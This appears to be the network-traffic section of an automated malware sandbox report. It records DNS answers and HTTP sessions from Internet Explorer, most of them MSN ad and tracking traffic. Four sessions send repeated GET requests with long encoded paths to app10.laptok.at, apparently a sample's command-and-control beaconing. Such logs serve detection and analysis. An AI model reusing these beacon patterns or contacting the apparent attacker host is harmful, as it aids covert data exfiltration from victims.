Oct 7, 2021 15:51:53.705178976 CEST	8.8.8.8	192.168.2.4	0xfe40	No error (0)	pixel.advertising.com	prod.ups-adcom.aolp-ds-prd.aws.oath.cloud		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:53.705178976 CEST	8.8.8.8	192.168.2.4	0xfe40	No error (0)	prod.ups-adcom.aolp-ds-prd.aws.oath.cloud	prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:53.705178976 CEST	8.8.8.8	192.168.2.4	0xfe40	No error (0)	prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud		18.197.99.6	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.705178976 CEST	8.8.8.8	192.168.2.4	0xfe40	No error (0)	prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud		54.93.133.131	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.705178976 CEST	8.8.8.8	192.168.2.4	0xfe40	No error (0)	prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud		18.159.140.98	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.705178976 CEST	8.8.8.8	192.168.2.4	0xfe40	No error (0)	prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud		35.157.177.200	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.705178976 CEST	8.8.8.8	192.168.2.4	0xfe40	No error (0)	prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud		52.59.77.57	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.705178976 CEST	8.8.8.8	192.168.2.4	0xfe40	No error (0)	prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud		18.156.147.57	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.705178976 CEST	8.8.8.8	192.168.2.4	0xfe40	No error (0)	prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud		18.184.95.242	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.705178976 CEST	8.8.8.8	192.168.2.4	0xfe40	No error (0)	prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud		18.184.201.8	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.907949924 CEST	8.8.8.8	192.168.2.4	0x4039	No error (0)	ups.analytics.yahoo.com	prod.ups-ats.aolp-ds-prd.aws.oath.cloud		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:53.907949924 CEST	8.8.8.8	192.168.2.4	0x4039	No error (0)	prod.ups-ats.aolp-ds-prd.aws.oath.cloud	prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloud		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:53.907949924 CEST	8.8.8.8	192.168.2.4	0x4039	No error (0)	prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloud		18.156.0.31	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.907949924 CEST	8.8.8.8	192.168.2.4	0x4039	No error (0)	prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloud		3.126.56.137	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.968924046 CEST	8.8.8.8	192.168.2.4	0x9dc8	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:53.968924046 CEST	8.8.8.8	192.168.2.4	0x9dc8	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:54.800415039 CEST	8.8.8.8	192.168.2.4	0x52b2	No error (0)	a-0019.a.dns.azurefd.net	a-0019.standard.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:55.156249046 CEST	8.8.8.8	192.168.2.4	0x6323	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:55.156249046 CEST	8.8.8.8	192.168.2.4	0x6323	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:55.156249046 CEST	8.8.8.8	192.168.2.4	0x6323	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:55.156249046 CEST	8.8.8.8	192.168.2.4	0x6323	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:55.156249046 CEST	8.8.8.8	192.168.2.4	0x6323	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:56.755434990 CEST	8.8.8.8	192.168.2.4	0xc1ae	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:52:23.706197023 CEST	8.8.8.8	192.168.2.4	0x9744	No error (0)	windowsupdate.s.llnwi.net		178.79.242.0	A (IP address)	IN (0x0001)
Oct 7, 2021 15:52:23.706197023 CEST	8.8.8.8	192.168.2.4	0x9744	No error (0)	windowsupdate.s.llnwi.net		178.79.242.128	A (IP address)	IN (0x0001)
Oct 7, 2021 15:53:08.193269968 CEST	8.8.8.8	192.168.2.4	0x7941	No error (0)	app10.laptok.at		87.106.18.141	A (IP address)	IN (0x0001)
Oct 7, 2021 15:53:29.505728006 CEST	8.8.8.8	192.168.2.4	0x41f5	No error (0)	app10.laptok.at		87.106.18.141	A (IP address)	IN (0x0001)
Oct 7, 2021 15:53:34.497850895 CEST	8.8.8.8	192.168.2.4	0xb573	No error (0)	app10.laptok.at		87.106.18.141	A (IP address)	IN (0x0001)
Oct 7, 2021 15:54:06.095714092 CEST	8.8.8.8	192.168.2.4	0xec88	No error (0)	app10.laptok.at		87.106.18.141	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

https:

geolocation.onetrust.com

btloader.com

ad-delivery.net

ad.doubleclick.net

cm.g.doubleclick.net

x.bidswitch.net

id.rlcdn.com

match.adsrvr.org

rtb.mfadsrvr.com

pixel.advertising.com

ups.analytics.yahoo.com

img.img-taboola.com

app10.laptok.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49776	104.20.184.68	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49790	104.26.7.139	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49822	18.195.217.206	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49823	18.195.217.206	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49830	18.156.81.187	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49810	142.250.203.98	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49836	18.197.99.6	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49835	18.197.99.6	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49838	18.156.0.31	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49837	18.156.0.31	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49841	18.156.0.31	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49842	18.156.0.31	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49806	172.67.69.19	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49847	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49848	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49849	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49852	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49851	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49850	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.4	49936	87.106.18.141	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 15:53:08.238802910 CEST	9025	OUT	GET /iyCuS9ekK6/ZKYlS2pL4_2F6YN5g/m2OzU2ez_2Fk/8F_2BnXwn7_/2BP90eUCGBXbRD/RIrhhRbIti7z5YuR4sWSi/epontKgntd3dejbE/4HUFCBnhPXzMXu2/uZ4C1mmtL8vyVF2uY5/jVMd1l3Jh/x4JupkgAYc9HSuaowzvE/VVWENV7cepnquu_2Fad/hpeYK_2BWzJKa_2BOghWOX/oxGEacWNQdGQC/A6Cks_2F/uCy09i_2F1Tm3pYwDufmBHp/hIUmxpzNN2/hckwDljGIXjYYf_2F/CNoayANu_2Bs/LgXcLBGeCG9/yBRWVpnUTSUqib2fLN/OUCgu HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: app10.laptok.at Connection: Keep-Alive
Oct 7, 2021 15:53:08.308232069 CEST	9025	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 13:53:08 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 7, 2021 15:53:08.582734108 CEST	9034	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: app10.laptok.at Connection: Keep-Alive
Oct 7, 2021 15:53:08.630127907 CEST	9034	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 13:53:08 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.4	49961	87.106.18.141	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 15:53:29.599540949 CEST	14564	OUT	GET /PdcGcGQosorY2QVhs_2/Bq9ScRQL0MmNo2gJrOrbiG/FDPb27Vu9hQGu/uY_2BMGI/NhNPnwzZnvYmoE7OGPBLQde/_2BY7mjJDF/ENcdEwVrEZJmnckQF/xH_2FgB8NMkY/CX5URbB5Mx9/tUnqO1qk0bc_2F/PzDjrCOWN7DecUA5P73Ps/FXVrTQO1zHZWe16C/R7nFvrjBN_2FbS0/Sy3O7HQGtcelrr3wGg/pY1rVDRtB/mUtxf1LfEhQfplP_2BGc/zeFFWNWagrH7B9kDL9x/Qcq2Cq8xJzMSz1YJbgWaq6/2niybL0WpOiiM/8AGzUeTW/_2FJcei9yt9KTfGqe2YPREu/h11 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: app10.laptok.at Connection: Keep-Alive
Oct 7, 2021 15:53:29.647164106 CEST	14565	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 13:53:29 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 7, 2021 15:53:29.942718029 CEST	14566	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: app10.laptok.at Connection: Keep-Alive
Oct 7, 2021 15:53:29.992330074 CEST	14566	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 13:53:29 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.4	49965	87.106.18.141	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 15:53:34.574084044 CEST	15196	OUT	GET /KiETfhAdcEl7/hLoS0_2BEdS/nu4Yf9GnANVyXk/YgUltJ7zs6xEJ2nloxeBs/eATUXgJAO922GcgP/GiUgV17y_2BdX4O/qFWwhpMGMf37wi_2BX/lkJe3cdrN/7WVmaELlUteTQIErFhWc/URRkn6I1CeKadfr0Tg_/2BWPYNHHR_2F2UImJAlhjY/i7YonJ3Ydwnd_/2BgOgiB9/MYuujPMMxg18nymjpE2JqFD/0fVq8D9YsD/phg5UsKLZOQl7kqi1/VTS_2FsAFu3G/3TrEzzwsBKW/3MeaiWTLCHCZlD/OY9S51u3L9nBtrZ_2BZx7/0yqRxDj4x6MboGVE/Q0bFKfsJ98F/gfX HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: app10.laptok.at Connection: Keep-Alive
Oct 7, 2021 15:53:34.620594978 CEST	15196	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 13:53:34 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.4	49997	87.106.18.141	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 15:54:06.183676004 CEST	16155	OUT	GET /tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6PN/mYOR8uYOgwt/6eDC9ufg4E5RLJ/VOnxrPlZG6FiNtHGLC5WH/SdTzqrBTR2p_2Fsz/3qaz2VU319DSvXM/bXNaVzi_2BhoNpjBto/CdRkBvfA0/fgYhpjExPXJDXoMrOLKj/_2BnxOA04HyPM26GFwn/mFc4so9IwBrMFkh7WH8no2/C7B38PnerqkdM/EgzIMhoK/Lnz3duCdEuM_2FN4IA_2F8v/u68N1tKS6F/4NEjvBzDbxJ7ghRIM/SCFXI7ZJd_2B/V2Z4tsab_2F/VPR0GKd HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: app10.laptok.at Connection: Keep-Alive
Oct 7, 2021 15:54:06.239257097 CEST	16155	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 13:54:06 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49804	172.217.168.38	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49811	142.250.203.98	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49813	18.156.81.187	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49812	18.156.81.187	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49815	35.244.174.68	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49820	76.223.111.131	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49819	76.223.111.131	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49776	104.20.184.68	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	Direction	Data
2021-10-07 13:51:46 UTC	OUT	GET /cookieconsentpub/v1/geo/location HTTP/1.1 Accept: application/javascript, /;q=0.8 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: geolocation.onetrust.com Connection: Keep-Alive
2021-10-07 13:51:46 UTC	IN	HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 13:51:46 GMT Content-Type: text/javascript Content-Length: 182 Connection: close Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 69a79b2e0cec4a7a-FRA
2021-10-07 13:51:46 UTC	IN	Data Raw: 6a 73 6f 6e 46 65 65 64 28 7b 22 63 6f 75 6e 74 72 79 22 3a 22 43 48 22 2c 22 73 74 61 74 65 22 3a 22 5a 47 22 2c 22 73 74 61 74 65 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 7a 69 70 63 6f 64 65 22 3a 22 36 33 33 31 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 31 39 33 37 30 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 34 32 30 32 30 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 45 55 22 7d 29 3b Data Ascii: jsonFeed({"country":"CH","state":"ZG","stateName":"Zug","zipcode":"6331","timezone":"Europe/Zurich","latitude":"47.19370","longitude":"8.42020","city":"Hunenberg","continent":"EU"});

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49790	104.26.7.139	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:49 UTC	0	OUT	GET /tag?o=6208086025961472&upapi=true HTTP/1.1 Accept: application/javascript, /;q=0.8 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: btloader.com Connection: Keep-Alive
2021-10-07 13:51:49 UTC	1	IN	HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 13:51:49 GMT Content-Type: application/javascript Content-Length: 10157 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=1800, must-revalidate Etag: "643eb1aad6ba3932ca744b96ffc00048" Vary: Origin Via: 1.1 google CF-Cache-Status: HIT Age: 3398 Accept-Ranges: bytes Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mbF%2F23%2FgtoSelwrfoG6QhQ0%2FYIaW2DCm1OFnrzBaHLLEfu4qc3p5PY5WUq%2FvSfOTOtZQPghKEZu4iVdCHI26wfxNDJX995dWeKNnDsCpIclhDUt77a429bDTX2VCgg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69a79b3d5cbc05c4-FRA
2021-10-07 13:51:49 UTC	1	IN	Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 69 2c 63 2c 6c 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 63 3d 63 7c 7c 50 72 6f 6d 69 73 65 29 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 74 72 79 7b 72 28 6c 2e 6e 65 78 74 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 74 72 79 7b 72 28 6c 2e 74 68 72 6f 77 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 76 61 72 20 74 3b 65 2e 64 6f 6e 65 3f 6e 28 65 2e 76 61 6c 75 65 29 3a 28 28 74 3d 65 2e 76 61 6c 75 65 29 69 6e 73 74 61 6e 63 65 6f 66 20 63 3f 74 3a 6e 65 77 20 63 28 66 75 6e 63 74 69 6f Data Ascii: !function(){"use strict";function r(e,i,c,l){return new(c=c\|\|Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(functio
2021-10-07 13:51:49 UTC	2	IN	Data Raw: 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 63 3b 29 74 72 79 7b 69 66 28 61 3d 31 2c 72 26 26 28 69 3d 32 26 74 5b 30 5d 3f 72 2e 72 65 74 75 72 6e 3a 74 5b 30 5d 3f 72 2e 74 68 72 6f 77 7c 7c 28 28 69 3d 72 2e 72 65 74 75 72 6e 29 26 26 69 2e 63 61 6c 6c 28 72 29 2c 30 29 3a 72 2e 6e 65 78 74 29 26 26 21 28 69 3d 69 2e 63 61 6c 6c 28 72 2c 74 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 69 3b 73 77 69 74 63 68 28 72 3d 30 2c 69 26 26 28 74 3d 5b 32 26 74 5b 30 5d 2c 69 2e Data Ascii: (t){return function(e){return function(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw\|\|((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.
2021-10-07 13:51:49 UTC	3	IN	Data Raw: 79 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 76 61 72 20 75 2c 61 2c 64 2c 62 2c 6d 3b 75 3d 22 36 32 30 38 30 38 36 30 32 35 39 36 31 34 37 32 22 2c 61 3d 22 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 64 3d 22 61 70 69 2e 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 62 3d 22 32 2e 30 2e 32 2d 32 2d 67 66 64 63 39 30 35 34 22 2c 6d 3d 22 22 3b 76 61 72 20 6f 3d 7b 22 6d 73 6e 2e 63 6f 6d 22 3a 7b 22 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 77 65 62 73 69 74 65 5f 69 64 22 3a 22 35 36 37 31 37 33 37 33 38 38 36 39 35 35 35 32 22 Data Ascii: y\|\|window.document.documentElement).appendChild(e)})}var u,a,d,b,m;u="6208086025961472",a="btloader.com",d="api.btloader.com",b="2.0.2-2-gfdc9054",m="";var o={"msn.com":{"content_enabled":true,"mobile_content_enabled":false,"website_id":"5671737388695552"
2021-10-07 13:51:49 UTC	5	IN	Data Raw: 6e 64 65 78 4f 66 28 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 26 26 28 74 3d 21 30 2c 70 2e 77 65 62 73 69 74 65 49 44 3d 6f 5b 6e 5d 2e 77 65 62 73 69 74 65 5f 69 64 2c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 29 3b 74 7c 7c 28 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 2f 2f 22 2b 64 2b 22 2f 6c 3f 65 76 65 6e 74 3d 75 6e 6b 6e 6f 77 6e 44 6f 6d 61 69 6e 26 6f 72 67 3d 22 2b 75 2b 22 26 64 6f 6d 61 69 6e 3d 22 2b 65 29 7d 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a 75 2c 64 6f Data Ascii: ndexOf(n.toLowerCase()))&&(t=!0,p.websiteID=o[n].website_id,p.contentEnabled=o[n].content_enabled,p.mobileContentEnabled=o[n].mobile_content_enabled);t\|\|((new Image).src="//"+d+"/l?event=unknownDomain&org="+u+"&domain="+e)}(),window.__bt_tag_d={orgID:u,do
2021-10-07 13:51:49 UTC	6	IN	Data Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 2b 74 29 29 7d 2c 6f 2b 3d 74 7d 29 7d 76 61 72 20 6c 3d 74 5b 30 5d 3b 69 66 28 6e 75 6c 6c 21 3d 6c 26 26 6c 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 73 3d 6f 2c 75 3d 31 2d 6f 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 2e 62 75 6e 64 6c 65 73 29 2e 73 6f 72 74 28 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6c 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 61 29 29 2c 6d 61 78 3a 4d 61 74 68 2e Data Ascii: on(e){var 